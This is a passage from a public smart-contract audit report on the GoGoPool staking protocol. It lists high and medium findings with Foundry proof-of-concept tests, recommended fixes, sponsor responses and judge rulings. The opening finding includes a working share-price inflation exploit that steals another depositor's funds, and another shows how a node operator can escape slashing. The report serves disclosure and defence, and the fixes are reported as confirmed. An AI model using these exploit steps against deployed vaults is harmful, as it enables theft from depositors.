to receive 1 share - Transfers
- Calls
to inflate exchange rate
The issue exists because the exchange rate is calculated as the ratio between the totalSupply
of shares and the totalAssets()
When the attacker transfers WAVAX
and calls syncRewards()
, the totalAssets()
increases gradually and therefore the exchange rate also increases.
function convertToShares(uint256 assets) public view virtual returns (uint256) {
uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.
return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());
Its important to note that while it is true that cycle length is 14 days, in practice time between cycles can very between 0-14 days. This is because syncRewards validates that the next reward cycle is evenly divided by the length (14 days).
function syncRewards() public {
// Ensure nextRewardsCycleEnd will be evenly divisible by `rewardsCycleLength`.
uint32 nextRewardsCycleEnd = ((timestamp + rewardsCycleLength) / rewardsCycleLength) * rewardsCycleLength;
- The closer the call to
is to the next evenly divisible value ofrewardsCycleLength
, the closer the nextrewardsCycleEnd
will be. - The closer the delta between
calls is, the higher revenue the attacker will get.
Edge case example:
is called with the timestamp 1672876799, syncRewards
will be able to be called again 1 second later.
(1672876799 + 14 days) / 14 days) * 14 days) = 1672876800
Additionally, the price inflation causes a revert for users who want to deposit less then the donation (WAVAX transfer) amount, due to precision rounding when depositing.
function depositAVAX() public payable returns (uint256 shares) {
if ((shares = previewDeposit(assets)) == 0) {
revert ZeroShares();
and convertToShares
function convertToShares(uint256 assets) public view virtual returns (uint256) {
uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.
return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());
function previewDeposit(uint256 assets) public view virtual returns (uint256) {
return convertToShares(assets);
Foundry POC
The POC will demonstrate the below scenario:
- Bob front-runs the vault creation.
- Bob deposits 1 WEI of AVAX to the vault.
- Bob transfers 1000 WAVAX to the vault.
- Bob calls
when block.timestamp =1672876799
. - Bob waits 1 second.
- Bob calls
again. Share price fully inflated. - Alice deposits 2000 AVAX to vault.
- Bob withdraws 1500 AVAX (steals 500 AVAX from Alice).
- Alice share earns her 1500 AVAX (although she deposited 2000).
Additionally, the POC will show that depositors trying to deposit less then the donation amount will revert.
Add the following test to TokenggAVAX.t.sol
: https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/test/unit/TokenggAVAX.t.sol#L108
function testShareInflation() public {
uint256 depositAmount = 1;
uint256 aliceDeposit = 2000 ether;
uint256 donationAmount = 1000 ether;
vm.deal(bob, donationAmount + depositAmount);
vm.deal(alice, aliceDeposit);
// create new ggAVAX
ggAVAXImpl = new TokenggAVAX();
ggAVAX = TokenggAVAX(deployProxy(address(ggAVAXImpl), address(guardian)));
ggAVAX.initialize(store, ERC20(address(wavax)));
// Bob deposits 1 WEI of AVAX
ggAVAX.depositAVAX{value: depositAmount}();
// Bob transfers 1000 AVAX to vault
wavax.deposit{value: donationAmount}();
wavax.transfer(address(ggAVAX), donationAmount);
// Bob Syncs rewards
// 1 second has passed
// This can range between 0-14 days. Every seconds, exchange rate rises
skip(1 seconds);
// Alice deposits 2000 AVAX
ggAVAX.depositAVAX{value: aliceDeposit}();
//Expectet revert when any depositor deposits less then 1000 AVAX
ggAVAX.depositAVAX{value: 10 ether}();
// Bob withdraws maximum assests for his share
uint256 maxWithdrawAssets = ggAVAX.maxWithdraw(bob);
//Validate bob has withdrawn 1500 AVAX
assertEq(bob.balance, 1500 ether);
// Alice withdraws maximum assests for her share
maxWithdrawAssets = ggAVAX.maxWithdraw(alice);
ggAVAX.syncRewards(); // to update accounting
// Validate that Alice withdraw 1500 AVAX + 1 (~500 AVAX loss)
assertEq(alice.balance, 1500 ether + 1);
To run the POC, execute:
forge test -m testShareInflation -v
Expected output:
Running 1 test for test/unit/TokenggAVAX.t.sol:TokenggAVAXTest
[PASS] testShareInflation() (gas: 3874399)
Test result: ok. 1 passed; 0 failed; finished in 8.71s
Tools Used
VS Code, Foundry
Recommended Mitigation Steps
When creating the vault add initial funds in order to make it harder to inflate the price. Best practice would add initial funds as part of the initialization of the contract (to prevent front-running).
emersoncloud (GoGoPool) confirmed
Alex the Entreprenerd (judge) commented:
The Warden has shown how, by performing a small deposit, followed by a transfer, shares can be rebased, causing a grief in the best case, and complete fund loss in the worst case for every subsequent depositor.
While the finding is fairly known, it’s impact should not be understated, and because of this I agree with High Severity.
I recommend watching this presentation by Riley Holterhus which shows possible mitigations for the attack: https://youtu.be/_pO2jDgL0XE?t=601
emersoncloud (GoGoPool) mitigated:
Initialize ggAVAX with a deposit: multisig-labs/gogopool#49
Status: Mitigation confirmed by RaymondFam and hansfriese.
[H-06] MinipoolManager: node operator can avoid being slashed
Submitted by HollaDieWaldfee, also found by enckrish, imare, bin2chen, danyams, 0xdeadbeef0x, cozzetti, and ladboy233
When staking is done, a Rialto multisig calls MinipoolManager.recordStakingEnd
If the avaxTotalRewardAmt
has the value zero, the MinipoolManager
will slash the node operator’s GGP.
The issue is that the amount to slash can be greater than the GGP balance the node operator has staked.
This will cause the call to MinipoolManager.recordStakingEnd
to revert because an underflow is detected.
This means a node operator can create a minipool that cannot be slashed.
A node operator must provide at least 10% of avaxAssigned
as collateral by staking GGP.
It is assumed that a node operator earns AVAX at a rate of 10% per year.
So if a Minipool is created with a duration of > 365 days
, the 10% collateral is not sufficient to pay the expected rewards.
This causes the function call to revert.
Another cause of the revert can be that the GGP price in AVAX changes. Specifically if the GGP price falls, there needs to be slashed more GGP.
Therefore if the GGP price drops enough it can cause the call to slash to revert.
I think it is important to say that with any collateralization ratio this can happen. The price of GGP must just drop enough or one must use a long enough duration.
The exact impact of this also depends on how the Rialto multisig handles failed calls to MinipoolManager.recordStakingEnd
It looks like if this happens, MinipoolManager.recordStakingError
(https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L484-L515) is called.
This allows the node operator to withdraw his GGP stake.
So in summary a node operator can create a Minipool that cannot be slashed and probably remove his GGP stake when it should have been slashed.
Proof of Concept
When calling MinipoolManager.recordStakingEnd
(https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L385-L440) and the avaxTotalRewardAmt
parameter is zero, the node operator is slashed:
// No rewards means validation period failed, must slash node ops GGP.
if (avaxTotalRewardAmt == 0) {
The MinipoolManager.slash
function (https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L670-L683) then calculates expectedAVAXRewardsAmt
and from this slashGGPAmt
uint256 avaxLiquidStakerAmt = getUint(keccak256(abi.encodePacked("minipool.item", index, ".avaxLiquidStakerAmt")));
uint256 expectedAVAXRewardsAmt = getExpectedAVAXRewardsAmt(duration, avaxLiquidStakerAmt);
uint256 slashGGPAmt = calculateGGPSlashAmt(expectedAVAXRewardsAmt);
Downstream there is then a revert due to underflow because of the following line in Staking.decreaseGGPStake
subUint(keccak256(abi.encodePacked("staker.item", stakerIndex, ".ggpStaked")), amount);
You can add the following foundry test to MinipoolManager.t.sol
function testRecordStakingEndWithSlashFail() public {
uint256 duration = 366 days;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
uint128 ggpStakeAmt = 100 ether;
ggp.approve(address(staking), MAX_AMT);
MinipoolManager.Minipool memory mp1 = createMinipool(depositAmt, avaxAssignmentRequest, duration);
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
bytes32 txID = keccak256("txid");
minipoolMgr.recordStakingStart(mp1.nodeID, txID, block.timestamp);
minipoolMgr.recordStakingEnd{value: validationAmt}(mp1.nodeID, block.timestamp, 0 ether);
See that it runs successfully with duration = 365 days
and fails with duration = 366 days
The similar issue occurs when the GGP price drops. I chose to implement the test with duration
as the cause for the underflow because your tests use a fixed AVAX/GGP price.
Tools Used
VSCode, Foundry
Recommended Mitigation Steps
You should check if the amount to be slashed is greater than the node operator’s GGP balance. If this is the case, the amount to be slashed should be set to the node operator’s GGP balance.
I believe this check can be implemented within the MinipoolManager.slash
function without breaking any of the existing accounting logic.
function slash(int256 index) private {
address nodeID = getAddress(keccak256(abi.encodePacked("minipool.item", index, ".nodeID")));
address owner = getAddress(keccak256(abi.encodePacked("minipool.item", index, ".owner")));
uint256 duration = getUint(keccak256(abi.encodePacked("minipool.item", index, ".duration")));
uint256 avaxLiquidStakerAmt = getUint(keccak256(abi.encodePacked("minipool.item", index, ".avaxLiquidStakerAmt")));
uint256 expectedAVAXRewardsAmt = getExpectedAVAXRewardsAmt(duration, avaxLiquidStakerAmt);
uint256 slashGGPAmt = calculateGGPSlashAmt(expectedAVAXRewardsAmt);
setUint(keccak256(abi.encodePacked("minipool.item", index, ".ggpSlashAmt")), slashGGPAmt);
emit GGPSlashed(nodeID, slashGGPAmt);
Staking staking = Staking(getContractAddress("Staking"));
if (slashGGPAmt > staking.getGGPStake(owner)) {
slashGGPAmt = staking.getGGPStake(owner);
staking.slashGGP(owner, slashGGPAmt);
emersoncloud (GoGoPool) confirmed, but commented:
This is a combination of two other issues from other wardens
- Slash amount shouldn’t depend on duration: https://github.com/code-423n4/2022-12-gogopool-findings/issues/694
- GGP Slash shouldn’t revert: https://github.com/code-423n4/2022-12-gogopool-findings/issues/743
Alex the Entreprenerd (judge) commented:
This finding combines 2 issues:
- If price drops Slash can revert -> Medium
- Attacker can set Duration to too high to cause a revert -> High
Am going to dedupe this and the rest, but ultimately I think these are different findings, that should have been filed separately.
Alex the Entreprenerd (judge) commented:
The Warden has shown how a malicious staker could bypass slashing, by inputting a duration that is beyond the intended amount.
Other reports have shown how to sidestep the slash or reduce it, however, this report shows how the bypass can be enacted maliciously to break the protocol functionality, to the attacker’s potential gain.
Because slashing is sidestepped in it’s entirety, I believe this finding to be of High Severity.
emersoncloud (GoGoPool) mitigated:
If staked GGP doesn’t cover slash amount, slash it all: multisig-labs/gogopool#41
Status: Original finding mitigated, but a medium severity economical risk is still present. Full details in reports from RaymondFam, ladboy233 and hansfriese. Also included in Mitigation Review section below.
Medium Risk Findings (22)
[M-01] RewardsPool.sol
: It is safe to have the startRewardsCycle
with WhenNotPaused
Submitted by ak1, also found by sces60107
When the contract is paused , allowing startRewardsCycle would inflate the token value which might not be safe.
Rewards should not be claimed by anyone when all other operations are paused.
I saw that the witdrawGGP
has this WhenNotPaused
Inflate should not consider the paused duration.
Let’s say, when the contract is paused for the duration of 2 months, then the dao, protocol, and node validator would enjoy the rewards. This is not good for a healthy protocol.
Proof of Concept
startRewardsCycle does not have the WhenNotPaused modifier.
function startRewardsCycle() external {
if (!canStartRewardsCycle()) {
revert UnableToStartRewardsCycle();
emit NewRewardsCycleStarted(getRewardsCycleTotalAmt());
// Set start of new rewards cycle
setUint(keccak256("RewardsPool.RewardsCycleStartTime"), block.timestamp);
// Mint any new tokens from GGP inflation
// This will always 'mint' (release) new tokens if the rewards cycle length requirement is met
// since inflation is on a 1 day interval and it needs at least one cycle since last calculation
uint256 multisigClaimContractAllotment = getClaimingContractDistribution("ClaimMultisig");
uint256 nopClaimContractAllotment = getClaimingContractDistribution("ClaimNodeOp");
uint256 daoClaimContractAllotment = getClaimingContractDistribution("ClaimProtocolDAO");
if (daoClaimContractAllotment + nopClaimContractAllotment + multisigClaimContractAllotment > getRewardsCycleTotalAmt()) {
revert IncorrectRewardsDistribution();
TokenGGP ggp = TokenGGP(getContractAddress("TokenGGP"));
Vault vault = Vault(getContractAddress("Vault"));
if (daoClaimContractAllotment > 0) {
emit ProtocolDAORewardsTransfered(daoClaimContractAllotment);
vault.transferToken("ClaimProtocolDAO", ggp, daoClaimContractAllotment);
if (multisigClaimContractAllotment > 0) {
emit MultisigRewardsTransfered(multisigClaimContractAllotment);
distributeMultisigAllotment(multisigClaimContractAllotment, vault, ggp);
if (nopClaimContractAllotment > 0) {
emit ClaimNodeOpRewardsTransfered(nopClaimContractAllotment);
ClaimNodeOp nopClaim = ClaimNodeOp(getContractAddress("ClaimNodeOp"));
vault.transferToken("ClaimNodeOp", ggp, nopClaimContractAllotment);
Recommended Mitigation Steps
We suggest to use WhenNotPaused
emersoncloud (GoGoPool) confirmed
Alex the Entreprenerd (judge) commented:
The Warden has shown an inconsistency as to how Pausing is used.
While other aspects of the code are pausable and under the control of the
, a call tostartRewardsCycle
can be performed by anyone, and in the case of a system-wide pause may create unfair gains or lost rewards.For this reason I agree with Medium Severity.
emersoncloud (GoGoPool) mitigated:
Pause startRewardsCycle when protocol is paused: multisig-labs/gogopool#22
Status: Mitigation confirmed with comments. Full details in report from RaymondFam.
[M-02] Coding logic of the contract upgrading renders upgrading contracts impractical
Submitted by gz627, also found by Allarious, ast3ros, bin2chen, brgltd, hihen, adriro, unforgiven, Czar102, nogo, nogo, imare, HE1M, KmanOfficial, neumo, AkshaySrivastav, betweenETHlines, peanuts, mookimgo, cccz, chaduke, and HollaDieWaldfee
File: https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/ProtocolDAO.sol
205 /// @notice Upgrade a contract by unregistering the existing address, and registring a new address and name
/// @param newAddr Address of the new contract
/// @param newName Name of the new contract
/// @param existingAddr Address of the existing contract to be deleted
209 function upgradeExistingContract(
address newAddr,
string memory newName,
address existingAddr
) external onlyGuardian {
registerContract(newAddr, newName);
216 }
Function ProtocolDAO.upgradeExistingContract
handles contract upgrading. However, there are multiple implicaitons of the coding logic in the function, which render the contract upgrading impractical.
Implication 1:
The above function upgradeExistingContract
registers the upgraded contract first, then unregisters the existing contract. This leads to the requirement that the upgraded contract name must be different from the existing contract name. Otherwise the updated contract address returned by Storage.getAddress(keccak256(abi.encodePacked("contract.address", contractName)))
will be address(0)
(please refer to the below POC Testcase 1). This is because if the upgraded contract uses the original name (i.e. the contract name is not changed), function call unregisterContract(existingAddr)
in the upgradeExistingContract
will override the registered contract address in Storage
to address(0) due to the use of the same contract name.
Since using the same name after upgrading will run into trouble with current coding logic, a safeguard should be in place to make sure two names are really different. For example, put this statement in the upgradeExistingContract
require(newName != existingName, "Name not changed");
, where existingName
can be obtained using:
string memory existingName = store.getString(keccak256(abi.encodePacked("contract.name", existingAddr)));
Implication 2:
If we really want a different name for an upgraded contract, we then get into more serious troubles: We have to upgrade other contracts that reference the upgraded contract since contract names are referenced mostly hardcoded (for security considerations). This may lead to a very complicated issue because contracts are cross-referenced.
For example, contract ClaimNodeOp
references contracts RewardsPool
, ProtocolDAO
and Staking
. At the same time, contract ClaimNodeOp
is referenced by contracts RewardsPool
and Staking
. This means that:
- If contract
was upgraded, which means the contract nameClaimNodeOp
was changed; - This requires contracts
to be upgraded (with new names) in order to correctly reference to newly namedClaimNodeOp
contract; - This further requires those contracts that reference
to be upgraded in order to correctly reference them; - and this further requires those contracts that reference the above upgraded contracts to be upgraded …
- This may lead to complicated code management issue and expose new vulnerabilites due to possible incomplete code adaptation.
- This may render the contracts upgrading impractical.
I rate this issue as high severity due to the fact that:
Contract upgradability is one of the main features of the whole system design (all other contracts are designed upgradable except for TokenGGP
, Storage
and Vault
). However, the current upgradeExistingContract
function’s coding logic requires the upgraded contract must change its name (refer to the below Testcase 1). This inturn requires to upgrade all relevant cross-referenced contracts (refer to the below Testcase 2). Thus leading to a quite serous code management issue while upgrading contracts, and renders upgrading contracts impractical.
Proof of Concept
Testcase 1:
This testcase demonstrates that current coding logic of upgrading contracts requires: the upgraded contract must change its name. Otherwise contract upgrading will run into issue.
Put the below test case in file ProtocolDAO.t.sol
. The test case demonstrates that ProtocolDAO.upgradeExistingContract
does not function properly if the upgraded contract does not change the name. That is: the upgraded contract address returned by Storage.getAddress(keccak256(abi.encodePacked("contract.address", contractName)))
will be address(0)
if its name unchanged.
function testUpgradeExistingContractWithNameUnchanged() public {
address addr = randAddress();
string memory name = "existingName";
address existingAddr = randAddress();
string memory existingName = "existingName";
dao.registerContract(existingAddr, existingName);
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", existingAddr))), true);
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", existingName))), existingAddr);
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", existingAddr))), existingName);
//@audit upgrade contract while name unchanged
dao.upgradeExistingContract(addr, name, existingAddr);
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", addr))), true);
//@audit the registered address was deleted by function call `PtotocolDAO.unregisterContract(existingAddr)`
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", name))), address(0));
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", addr))), name);
//@audit verify that the old contract has been de-registered
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", existingAddr))), false);
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", existingName))), address(0));
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", existingAddr))), "");
Testcase 2:
This testcase demonstrates that current coding logic of upgrading contracts requires: in order to upgrade a single contract, all cross-referenced contracts have to be upgraded and change their names. Otherwise, other contracts will run into issues.
If the upgraded contract does change its name, contract upgrading will succeed. However, other contracts’ functions that reference the upgraded contract will fail due to referencing hardcoded contract name.
The below testcase upgrades contract ClaimNodeOp
to ClaimNodeOpV2
. Then, contract Staking
calls increaseGGPRewards
which references hardcoded contract name ClaimNodeOp
in its modifier. The call is failed.
Test steps:
- Copy contract file
, and rename the contract name fromClaimNodeOp
in fileClaimNodeOpV2.sol
; - Put the below test file
under foldertest/unit/
; - Run the test.
Note: In order to test actual function call after upgrading contract, this testcase upgrades a real contract ClaimNodeOp
. This is different from the above Testcase 1 which uses a random address to simulate a contract.
// File: UpgradeContractIssue.t.sol
// SPDX-License-Identifier: GPL-3.0-only
pragma solidity 0.8.17;
import "./utils/BaseTest.sol";
import {ClaimNodeOpV2} from "../../contracts/contract/ClaimNodeOpV2.sol";
import {BaseAbstract} from "../../contracts/contract/BaseAbstract.sol";
contract UpgradeContractIssueTest is BaseTest {
using FixedPointMathLib for uint256;
address private nodeOp1;
uint256 internal constant TOTAL_INITIAL_GGP_SUPPLY = 22_500_000 ether;
function setUp() public override {
nodeOp1 = getActorWithTokens("nodeOp1", MAX_AMT, MAX_AMT);
ggp.approve(address(staking), MAX_AMT);
function fundGGPRewardsPool() public {
// guardian is minted 100% of the supply
uint256 rewardsPoolAmt = TOTAL_INITIAL_GGP_SUPPLY.mulWadDown(.20 ether);
ggp.approve(address(vault), rewardsPoolAmt);
vault.depositToken("RewardsPool", ggp, rewardsPoolAmt);
function testUpgradeExistingContractWithNameChanged() public {
staking.stakeGGP(10 ether);
//@audit increase GGPRewards before upgrading contract - succeed
staking.increaseGGPRewards(address(nodeOp1), 10 ether);
assert(staking.getGGPRewards(address(nodeOp1)) == 10 ether);
//@audit Start to upgrade contract ClaimNodeOp to ClaimNodeOpV2
//@audit upgrad contract
ClaimNodeOpV2 nopClaimV2 = new ClaimNodeOpV2(store, ggp);
address addr = address(nopClaimV2);
//@audit contract name must be changed due to the limitation of `upgradeExistingContract` coding logic
string memory name = "ClaimNodeOpV2";
//@audit get existing contract ClaimNodeOp info
address existingAddr = address(nopClaim);
string memory existingName = "ClaimNodeOp";
//@audit the existing contract should be already registered. Verify its info.
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", existingAddr))), true);
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", existingName))), existingAddr);
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", existingAddr))), existingName);
//@audit Upgrade contract
dao.upgradeExistingContract(addr, name, existingAddr);
//@audit verify that the upgraded contract has correct contract info registered
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", addr))), true);
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", name))), addr);
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", addr))), name);
//@audit verify that the old contract has been de-registered
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", existingAddr))), false);
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", existingName))), address(0));
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", existingAddr))), "");
staking.stakeGGP(10 ether);
//@audit increase GGPRewards after upgrading contract ClaimNodeOp to ClaimNodeOpV2
vm.prank(address(nopClaimV2)); //@audit using the upgraded contract
//@audit revert due to contract Staking using hardcoded contract name "ClaimNodeOp" in the modifier
staking.increaseGGPRewards(address(nodeOp1), 10 ether);
Recommended Mitigation Steps
- Upgrading contract does not have to change contranct names especially in such a complicated system wherein contracts are cross-referenced in a hardcoded way. I would suggest not to change contract names when upgrading contracts.
- In function
definition, swap fucnction call sequence betweenregisterContract()
so that contract names can keep unchanged after upgrading. That is, the modified function would be:
File: https://github.com/code-423n4/2022-12-gogopool/blob/main/contracts/contract/ProtocolDAO.sol
205 /// @notice Upgrade a contract by unregistering the existing address, and registring a new address and name
/// @param newAddr Address of the new contract
/// @param newName Name of the new contract
/// @param existingAddr Address of the existing contract to be deleted
209 function upgradeExistingContract(
address newAddr,
string memory newName, //@audit this `newName` parameter can be removed if upgrading don't change contract name
address existingAddr
) external onlyGuardian {
unregisterContract(existingAddr); //@audit unregister the existing contract first
registerContract(newAddr, newName); //@audit then register the upgraded contract
216 }
POC of Mitigation:
After the above recommended mitigation, the below Testcase verifies that after upgrading contracts, other contract’s functions, which reference the hardcoded contract name, can still opetate correctly.
- Make the above recommended mitigation in function
; - Put the below test file
under foldertest/unit/
; - Run the test.
Note: Since we don’t change the upgraded contract name, for testing purpose, we just need to create a new contract instance (so that the contract instance address is changed) to simulate the contract upgrading.
// File: UpgradeContractImproved.t.sol
// SPDX-License-Identifier: GPL-3.0-only
pragma solidity 0.8.17;
import "./utils/BaseTest.sol";
import {ClaimNodeOp} from "../../contracts/contract/ClaimNodeOp.sol";
import {BaseAbstract} from "../../contracts/contract/BaseAbstract.sol";
contract UpgradeContractImprovedTest is BaseTest {
using FixedPointMathLib for uint256;
address private nodeOp1;
uint256 internal constant TOTAL_INITIAL_GGP_SUPPLY = 22_500_000 ether;
function setUp() public override {
nodeOp1 = getActorWithTokens("nodeOp1", MAX_AMT, MAX_AMT);
ggp.approve(address(staking), MAX_AMT);
function fundGGPRewardsPool() public {
// guardian is minted 100% of the supply
uint256 rewardsPoolAmt = TOTAL_INITIAL_GGP_SUPPLY.mulWadDown(.20 ether);
ggp.approve(address(vault), rewardsPoolAmt);
vault.depositToken("RewardsPool", ggp, rewardsPoolAmt);
function testUpgradeContractCorrectlyWithNameUnChanged() public {
//@audit increase GGPRewards before upgrading contract - no problem
staking.stakeGGP(10 ether);
staking.increaseGGPRewards(address(nodeOp1), 10 ether);
assert(staking.getGGPRewards(address(nodeOp1)) == 10 ether);
//@audit Start to upgrade contract ClaimNodeOp
//@audit upgraded contract by creating a new contract instance
ClaimNodeOp nopClaimV2 = new ClaimNodeOp(store, ggp);
address addr = address(nopClaimV2);
//@audit contract name is not changed!
string memory name = "ClaimNodeOp";
//@audit get existing contract info
address existingAddr = address(nopClaim);
string memory existingName = "ClaimNodeOp";
//@audit new contract address is different from the old one
assertFalse(addr == existingAddr);
//@audit the existing contract should be already registered. Verify its info.
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", existingAddr))), true);
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", existingName))), existingAddr);
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", existingAddr))), existingName);
//@audit Upgrade contract
dao.upgradeExistingContract(addr, name, existingAddr);
//@audit verify the upgraded contract has correct contract info registered
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", addr))), true);
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", name))), addr);
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", addr))), name);
//@audit verify that the old contract has been de-registered
assertEq(store.getBool(keccak256(abi.encodePacked("contract.exists", existingAddr))), false);
assertEq(store.getString(keccak256(abi.encodePacked("contract.name", existingAddr))), "");
//@audit The contract has new address now. Note that: existingName == name
assertEq(store.getAddress(keccak256(abi.encodePacked("contract.address", existingName))), addr);
//@audit increase GGPRewards after upgrading contract ClaimNodeOp to ClaimNodeOpV2
staking.stakeGGP(10 ether);
vm.prank(address(nopClaimV2)); //@audit using the new contract
//@audit Successfully call the below function with hardcoded contract name "ClaimNodeOp" in the modifier
staking.increaseGGPRewards(address(nodeOp1), 10 ether);
//@audit Successfully increased!
assert(staking.getGGPRewards(address(nodeOp1)) == 20 ether);
emersoncloud (GoGoPool) confirmed
0xju1ie (GoGoPool) disagreed with severity and commented:
Not sure if this is considered a high since there isn’t a direct loss of funds?
Medium: Assets not at direct risk, but the function of the protocol or its availability could be impacted, or leak value with a hypothetical attack path with stated assumptions, but external requirements.
Alex the Entreprenerd (judge) commented:
In spite of the lack of risk for Principal, a core functionality of the protocol is impaired.
This has to be countered versus the requirement of the names being the same, which intuitively seems to be the intended use case, as changing the name would also break balances / other integrations such as the modifier
.The other side of the argument is that the mistake is still fixable by the same actor within a reasonable time frame.
Alex the Entreprenerd (judge) decreased severity to Medium and commented:
I believe the finding is meaningful and well written, but ultimately the damage can be undone with a follow-up call to
.Because of this am downgrading to Medium Severity.
emersoncloud (GoGoPool) mitigated:
Fix upgrade to work when a contract has the same name: multisig-labs/gogopool#32
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-03] NodeOp funds may be trapped by a invalid state transition
Submitted by 0xbepresent, also found by cozzetti, wagmi, datapunk, sces60107, peritoflores, unforgiven, yixxas, immeas, Ch_301, 0Kage, kaliberpoziomka8552, rvierdiiev, Atarpara, and Manboy
The Multisig can call MinipoolManager.sol::recordStakingError()
if there is an error while registering the node as a validator. Also the Multisig can call MinipoolManager.sol::finishFailedMinipoolByMultisig() in order to “finish” the NodeOp’s minipool proccess.
If the Multisig accidentally/intentionally calls recordStakingError()
then finishFailedMinipoolByMultisig()
the NodeOp funds may be trapped in the protocol.
The finishFailedMinipoolByMultisig()
has the next comment: Multisig can move a minipool from the error state to the finished state after a human review of the error but the NodeOp should be able to withdraw his funds after a finished minipool.
Proof of Concept
I created a test for this situation in MinipoolManager.t.sol
. At the end you can observe that the withdrawMinipoolFunds()
reverts with InvalidStateTransition
- NodeOp creates the minipool
- Rialto calls claimAndInitiateStaking
- Something goes wrong and Rialto calls recordStakingError()
- Rialto accidentally/intentionally calls finishFailedMinipoolByMultisig() in order to finish the NodeOp’s minipool
- The NodeOp can not withdraw his funds. The withdraw function reverts with InvalidStateTransition() error
function testUserFundsStuckErrorFinished() public {
// NodeOp funds may be trapped by a invalid state transition
// 1. NodeOp creates the minipool
// 2. Rialto calls claimAndInitiateStaking
// 3. Something goes wrong and Rialto calls recordStakingError()
// 4. Rialto accidentally/intentionally calls finishFailedMinipoolByMultisig() in order
// to finish the NodeOp's minipool
// 5. The NodeOp can not withdraw his funds. The withdraw function reverts with
// InvalidStateTransition() error
// 1. Create the minipool by the NodeOp
address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
ggAVAX.depositAVAX{value: MAX_AMT}();
assertEq(liqStaker1.balance, 0);
uint256 duration = 2 weeks;
uint256 depositAmt = 1000 ether;
uint256 avaxAssignmentRequest = 1000 ether;
uint256 validationAmt = depositAmt + avaxAssignmentRequest;
uint128 ggpStakeAmt = 200 ether;
ggp.approve(address(staking), ggpStakeAmt);
MinipoolManager.Minipool memory mp = createMinipool(depositAmt, avaxAssignmentRequest, duration);
assertEq(vault.balanceOf("MinipoolManager"), depositAmt);
// 2. Rialto calls claimAndInitiateStaking
assertEq(vault.balanceOf("MinipoolManager"), 0);
// 3. Something goes wrong and Rialto calls recordStakingError()
bytes32 errorCode = "INVALID_NODEID";
minipoolMgr.recordStakingError{value: validationAmt}(mp.nodeID, errorCode);
// NodeOps funds should be back in vault
assertEq(vault.balanceOf("MinipoolManager"), depositAmt);
// 4. Rialto accidentally/intentionally calls finishFailedMinipoolByMultisig() in order
// to finish the NodeOp's minipool
// 5. The NodeOp can not withdraw his funds. The withdraw function reverts with
// InvalidStateTransition() error
Tools used
Recommended Mitigation Steps
The withdrawMinipoolFunds
could add another requireValidStateTransition in order to allow the withdraw after the finished minipoool.
emersoncloud (GoGoPool) confirmed
0xju1ie (GoGoPool) disagreed with severity and commented:
I think this should be the primary for the
problem.Medium feels like a more appropriate severity. This issue depends on rialto multisig improperly functioning but we do intend to fix the finishFailedMinipoolByMultisig method to not lock users out of their funds.
Alex the Entreprenerd (judge) decreased severity to Medium and commented:
The Warden has shown a potential issues with the FSM of the system, per the Audit Scope, the transition should not happen on the deployed system, however, the Warden has shown an issue with the state transition check and has detailed the consequences of it.
For this reason, I agree with Medium Severity.
emersoncloud (GoGoPool) mitigated:
Remove method that trapped Node Operator’s funds: multisig-labs/gogopool#20
Status: Mitigation confirmed by RaymondFam and hansfriese.
[M-04] requireNextActiveMultisig
will always return the first enabled multisig which increases the probability of stuck minipools
Submitted by imare, also found by HollaDieWaldfee, btk, jadezti, gz627, nogo, imare, Jeiwan, sk8erboy, enckrish, AkshaySrivastav, betweenETHlines, simon135, 0xbepresent, 0Kage, kaliberpoziomka8552, 0Kage, Saintcode_, Faith, and dic0de
For every created minipool a multisig address is set to continue validator interactions.
Every minipool multisig address get assigned by calling requireNextActiveMultisig
This function always return the first enabled multisig address.
In case the specific address is disabled all created minipools will be stuck with this address which increase the probability of also funds being stuck.
Probability of funds being stuck increases if requireNextActiveMultisig
always return the same address.
Proof of Concept
Recommended Mitigation Steps
Use a strategy like round robin to assign next active multisig to minipool.
Something like this :
private uint nextMultisigAddressIdx;
function requireNextActiveMultisig() external view returns (address) {
uint256 total = getUint(keccak256("multisig.count"));
address addr;
bool enabled;
uint256 i = nextMultisigAddressIdx; // cache last used
